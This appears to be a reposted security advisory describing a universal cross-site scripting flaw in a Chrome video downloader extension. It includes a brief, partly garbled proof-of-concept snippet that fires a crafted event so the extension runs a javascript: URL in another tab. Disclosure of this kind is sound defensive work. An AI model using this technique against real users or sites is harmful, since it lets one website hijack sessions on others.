Video Downloader Universal Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

Video Downloader Extension: Universal XSS Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users: It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site). Any website can do this: // Change the active tab""); // Run code in the new tab setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000); That will run arbitrary code on <a href="" title="" class="" rel="nofollow"></a>. I reported this bug to the cws team. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: taviso

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top